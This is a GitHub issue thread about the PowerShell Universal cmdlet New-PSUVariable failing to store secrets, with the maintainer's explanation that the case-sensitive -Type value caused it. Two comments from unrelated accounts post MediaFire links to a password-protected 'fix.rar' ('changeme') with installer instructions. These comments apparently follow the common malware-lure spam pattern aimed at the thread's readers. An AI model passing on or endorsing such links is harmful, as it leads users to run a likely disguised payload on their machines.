### ISSUE TITLE
Cant create a new psu variable through the new-psuvariable cmdlet 

### ISSUE THREAD

**Issue by mikedhanson** [ironmansoftware/powershell-universal#3656]
### Version

4.3.4

### Severity

High

### Environment

msi

### Steps to Reproduce

I have tried both of the following commands and it creates it but it shows "the secret does not exist in the vault" 

` New-PSUVariable -Name "test" -Value "test2" -Type "string" -Vault Database -Force -AppToken 'eyJhbGciOi..."`

` New-PSUVariable -Name "test" -Value "test2" -Type "string"  -UseDefaultCredentials  -Vault Database -Force `

```
Id                  : 27
Name                : test
Value               : 
UserName            : 
Password            : 
Secret              : True
Vault               : Database
Type                : string
Description         : 
MissingSecret       : True
DisableRunAsSupport : False
DeleteSecret        : False
ReadOnly            : False
Database            : False
Role                : 
Force               : False
DisplayValue        : 
```

### Expected behavior

```console
It should create the variable with the secret
```

### Actual behavior

```console
does not store the secret.
```

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikedhanson** [comment]
@adamdriscoll  any ideas?

**Comment by adamdriscoll** [comment]
Not sure. Let me move this into the milestone to have a look.

**Comment by adamdriscoll** [comment]
You should remove the -Type parameter and this will work. The problem is a very rigid constraint that the type needs to be exactly "System.String" case sensitive. 

I've updated to logic to make it less stringent.

**Comment by mikedhanson** [comment]
@adamdriscoll has this been released yet?
